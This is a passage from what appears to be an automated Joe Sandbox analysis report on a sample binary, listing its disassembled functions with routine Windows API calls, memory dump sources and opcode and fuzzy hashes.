                                                                                                                  • DestroyWindow.USER32(?), ref: 00B42FB1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                  • String ID: SysAnimate32
                                                                                                                  • API String ID: 3529120543-1011021900
                                                                                                                  • Opcode ID: 898c6476327b79f400c26c4fad7b9144e19b5b62b83b145de945667f8fd122bf
                                                                                                                  • Instruction ID: b225a66547a72a6f7c25d1aeba67034baf5c1870d581b73b19cb4cca37426386
                                                                                                                  • Opcode Fuzzy Hash: 898c6476327b79f400c26c4fad7b9144e19b5b62b83b145de945667f8fd122bf
                                                                                                                  • Instruction Fuzzy Hash: 7E219A71200209ABEB104F64DC80EBB3BFDEB69764F904698F950D31A0D771DD95B760
                                                                                                                  Function 00AD4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AD4D1E,00AE28E9,?,00AD4CBE,00AE28E9,00B788B8,0000000C,00AD4E15,00AE28E9,00000002), ref: 00AD4D8D
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AD4DA0
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00AD4D1E,00AE28E9,?,00AD4CBE,00AE28E9,00B788B8,0000000C,00AD4E15,00AE28E9,00000002,00000000), ref: 00AD4DC3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 56a521915fc4d07a0a4a6fb4c2ff87ae517de720f66173d1c4596b3468e36e6d
                                                                                                                  • Instruction ID: 027358218ceecb5387e08ca42b2aa063829f45bbadf2a0cf2ec0e4fd8cb3da1b
                                                                                                                  • Opcode Fuzzy Hash: 56a521915fc4d07a0a4a6fb4c2ff87ae517de720f66173d1c4596b3468e36e6d
                                                                                                                  • Instruction Fuzzy Hash: CDF04435541208BBDB515F90DC49BADBFF5EF48B52F000099F80AA3260DF315E40CA90
                                                                                                                  Function 00B0D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32 ref: 00B0D3AD
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B0D3BF
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00B0D3E5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                  • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                  • API String ID: 145871493-2590602151
                                                                                                                  • Opcode ID: 4d8656b3e837d6738b5963830a42682656405fb9b9e74148bea3efd6b29017dd
                                                                                                                  • Instruction ID: 02b3e515923c6e234839a3eda4fc986fb964ee219e350d0c073b590f8870ca14
                                                                                                                  • Opcode Fuzzy Hash: 4d8656b3e837d6738b5963830a42682656405fb9b9e74148bea3efd6b29017dd
                                                                                                                  • Instruction Fuzzy Hash: 76F0A07A406A21ABD7B11794CC98B69BEA4AF11B41B9581D9F406F21D4DF20CE408B9A
                                                                                                                  Function 00AB4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AB4EDD,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E9C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AB4EAE
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00AB4EDD,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4EC0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                  • API String ID: 145871493-3689287502
                                                                                                                  • Opcode ID: 017d237ec98e7831853de030ec651b600e01cb414ed646fbcae06375036560f6
                                                                                                                  • Instruction ID: 53ebd14fa6271dbe4e82e5baa909dd7a2436d6e477760c4157c7c49542d661e4
                                                                                                                  • Opcode Fuzzy Hash: 017d237ec98e7831853de030ec651b600e01cb414ed646fbcae06375036560f6
                                                                                                                  • Instruction Fuzzy Hash: D3E0CD39A075225BD37117296C18BDF6DACBF86F627050115FC04F3113DF64CE0185A1
                                                                                                                  Function 00AB4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AF3CDE,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E62
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AB4E74
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00AF3CDE,?,00B81418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AB4E87
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                  • API String ID: 145871493-1355242751
                                                                                                                  • Opcode ID: 71adf00e01e6eea8f0e73bceb09bc9ce446e9555cedd489cc20e147952676a6a
                                                                                                                  • Instruction ID: 70d60cbe8098fa7fc33d737fa9d79a76f54a90636dad25ac6163d00808f71973
                                                                                                                  • Opcode Fuzzy Hash: 71adf00e01e6eea8f0e73bceb09bc9ce446e9555cedd489cc20e147952676a6a
                                                                                                                  • Instruction Fuzzy Hash: 08D01239503A216756621B256C18ECB6F6CBF8AF513054555F905B3126CF61CF01D5E1
                                                                                                                  Function 00B3A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00B3A427
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B3A435
                                                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B3A468
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00B3A63D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3488606520-0
                                                                                                                  • Opcode ID: 5e3722c085f9bb949d1aef98815ef202181e3d255ec79bc2b6be950d1e54bd5c
                                                                                                                  • Instruction ID: 11072e8ce147ab8cab52e2e8f3edd0d8e6ace339c815b5fa4afc74a33bfcb222
                                                                                                                  • Opcode Fuzzy Hash: 5e3722c085f9bb949d1aef98815ef202181e3d255ec79bc2b6be950d1e54bd5c
                                                                                                                  • Instruction Fuzzy Hash: 15A17F71604301AFD724DF24C986F2AB7E5AF84714F24885DF59A9B392DBB0EC418B92
                                                                                                                  Function 00AEBB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B53700), ref: 00AEBB91
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B8121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00AEBC09
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B81270,000000FF,?,0000003F,00000000,?), ref: 00AEBC36
                                                                                                                  • _free.LIBCMT ref: 00AEBB7F
                                                                                                                    • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
                                                                                                                    • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
                                                                                                                  • _free.LIBCMT ref: 00AEBD4B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1286116820-0
                                                                                                                  • Opcode ID: 3661b6a58e44878d270034e40af3ef1a70f4ed6c5caf438adc6cc79c6b2d0400
                                                                                                                  • Instruction ID: 806e7dd7708516e85e07924fd95915b81d215dd26082d7d621101dcb8457ee45
                                                                                                                  • Opcode Fuzzy Hash: 3661b6a58e44878d270034e40af3ef1a70f4ed6c5caf438adc6cc79c6b2d0400
                                                                                                                  • Instruction Fuzzy Hash: 0B51F971914249EFCB10EF6A9D899AFB7BCEF84310F10066AE554D71A1EF309E41CB60
                                                                                                                  Function 00B1E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B1DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B1CF22,?), ref: 00B1DDFD
                                                                                                                    • Part of subcall function 00B1DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B1CF22,?), ref: 00B1DE16
                                                                                                                    • Part of subcall function 00B1E199: GetFileAttributesW.KERNEL32(?,00B1CF95), ref: 00B1E19A
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00B1E473
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00B1E4AC
                                                                                                                  • _wcslen.LIBCMT ref: 00B1E5EB
                                                                                                                  • _wcslen.LIBCMT ref: 00B1E603
                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B1E650
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3183298772-0
                                                                                                                  • Opcode ID: aa1479815e09dd1f128df9503f18ddb82c7d45c3d396cc61dfbed362671a8771
                                                                                                                  • Instruction ID: fbbe6445221b2711924fece1dbe08490f0b58885cd833eed6c14ebe6afef491d
                                                                                                                  • Opcode Fuzzy Hash: aa1479815e09dd1f128df9503f18ddb82c7d45c3d396cc61dfbed362671a8771
                                                                                                                  • Instruction Fuzzy Hash: 095180B24083459BC724DBA0DC819DF77ECEF85340F40496EFA99D3151EE74E6888766
                                                                                                                  Function 00B3B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B3B6AE,?,?), ref: 00B3C9B5
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3C9F1
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA68
                                                                                                                    • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA9E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3BAA5
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B3BB00
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B3BB63
                                                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00B3BBA6
                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3BBB3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 826366716-0
                                                                                                                  • Opcode ID: 9414acc169790f3811b991c8da77f0fac5b38ccd3a1727146975758be8d050ad
                                                                                                                  • Instruction ID: 471ae1a0d9bd646edada2e4ef330597bd5b356cfca31602452ae8681998781d4
                                                                                                                  • Opcode Fuzzy Hash: 9414acc169790f3811b991c8da77f0fac5b38ccd3a1727146975758be8d050ad
                                                                                                                  • Instruction Fuzzy Hash: 1F619031208241AFD314DF14C491E6ABBE9FF84308F24859DF59A8B2A2DF31ED45CB92
                                                                                                                  Function 00B18BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00B18BCD
                                                                                                                  • VariantClear.OLEAUT32 ref: 00B18C3E
                                                                                                                  • VariantClear.OLEAUT32 ref: 00B18C9D
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B18D10
                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B18D3B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$Clear$ChangeInitType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4136290138-0
                                                                                                                  • Opcode ID: 31675d710da3feaeafdb466b02288c29efa06925c392b5c0b23666490d01dbfe
                                                                                                                  • Instruction ID: ac3ca75ff42eca7271eb7728d8d5b16ee80822a46889dc7b9c8e1f1860a6f74a
                                                                                                                  • Opcode Fuzzy Hash: 31675d710da3feaeafdb466b02288c29efa06925c392b5c0b23666490d01dbfe
                                                                                                                  • Instruction Fuzzy Hash: BD516CB5A00219EFCB10CF68D894AAAB7F5FF89310B158569F905DB350EB30E911CF90
                                                                                                                  Function 00B28AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B28BAE
                                                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B28BDA
                                                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B28C32
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B28C57
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B28C5F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$SectionWrite$String
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2832842796-0
                                                                                                                  • Opcode ID: 03b40bff858ad15718bdbc73cd8051bbee2bdd2277b0d278a359bbb727d7378f
                                                                                                                  • Instruction ID: 325b42dc024b65bf3bea97e24e7cae9c227df01f3be4e7c090baa8c11d392a47
                                                                                                                  • Opcode Fuzzy Hash: 03b40bff858ad15718bdbc73cd8051bbee2bdd2277b0d278a359bbb727d7378f
                                                                                                                  • Instruction Fuzzy Hash: E1516F35A002149FCB11DF64C981EADBBF5FF49314F088498E84AAB362CB75ED41DBA0
                                                                                                                  Function 00B38EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B38F40
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B38FD0
                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B38FEC
                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00B39032
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00B39052
                                                                                                                    • Part of subcall function 00ACF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B21043,?,7644E610), ref: 00ACF6E6
                                                                                                                    • Part of subcall function 00ACF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B0FA64,00000000,00000000,?,?,00B21043,?,7644E610,?,00B0FA64), ref: 00ACF70D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 666041331-0
                                                                                                                  • Opcode ID: fc6dc12a60cbb472c9fb9282a89eca47496085fc564e97465717d8d0400d8e51
                                                                                                                  • Instruction ID: bb717dcdc3f830215a4a71bbb50d9f880ba591ad4bf6efbec88e394a336713f1
                                                                                                                  • Opcode Fuzzy Hash: fc6dc12a60cbb472c9fb9282a89eca47496085fc564e97465717d8d0400d8e51
                                                                                                                  • Instruction Fuzzy Hash: A2514838605205DFCB15DF68C5848ADBBF5FF49314F1481A8E80AAB362DB71ED86CB91
                                                                                                                  Function 00B46B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B46C33
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00B46C4A
                                                                                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B46C73
                                                                                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B2AB79,00000000,00000000), ref: 00B46C98
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B46CC7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$MessageSendShow
                                                                                                                  • String ID:
